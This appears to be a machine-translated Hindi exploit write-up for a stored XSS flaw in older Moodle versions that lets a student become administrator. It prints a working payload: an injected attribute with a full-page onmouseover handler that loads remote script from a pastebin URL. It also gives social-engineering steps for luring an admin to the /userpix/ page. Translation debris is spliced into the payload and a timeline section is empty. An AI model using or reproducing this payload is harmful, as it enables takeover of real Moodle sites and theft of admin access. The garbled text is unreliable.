
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC विशेषाधिकार वृद्धि (छात्र से व्यवस्थापक) के लिए
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC विशेषाधिकार वृद्धि (छात्र से प्रशासक) के लिए। यह उन पुराने बगों में से एक है जिसे मैंने एक शैक्षणिक संस्थान में पिछले पेंटेस्ट के दौरान खोजा था। यह उस समय प्रशासक पहुँच चुराने और केवल एक साधारण बग का उपयोग करके Moodle पर पूर्ण नियंत्रण प्राप्त करने के लिए पर्याप्त सफल रहा था।
हम git इतिहास से देख सकते हैं कि यह बग Moodle के पुराने संस्करणों (2003) से अस्तित्व में था और 2019 में ही पैच किया गया।
समयरेखा:
केवल शैक्षणिक उद्देश्यों के लिए। इस शोषण का अवैध गतिविधियों के लिए उपयोग न करें। लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
userid का मान अपनी आईडी से बदलें। मान लें कि URL https://pastebin.com/raw/xxxxxxxx है।" style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement पर सेट करें।('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS') पर सेट करें।/userpix/ पृष्ठ खोलने के लिए कहें या अपनी पोस्ट पर उस पृष्ठ का लिंक डालें और प्रतीक्षा करें।यदि सफल होता है, तो आपका खाता प्रशासक के रूप में जोड़ दिया जाएगा।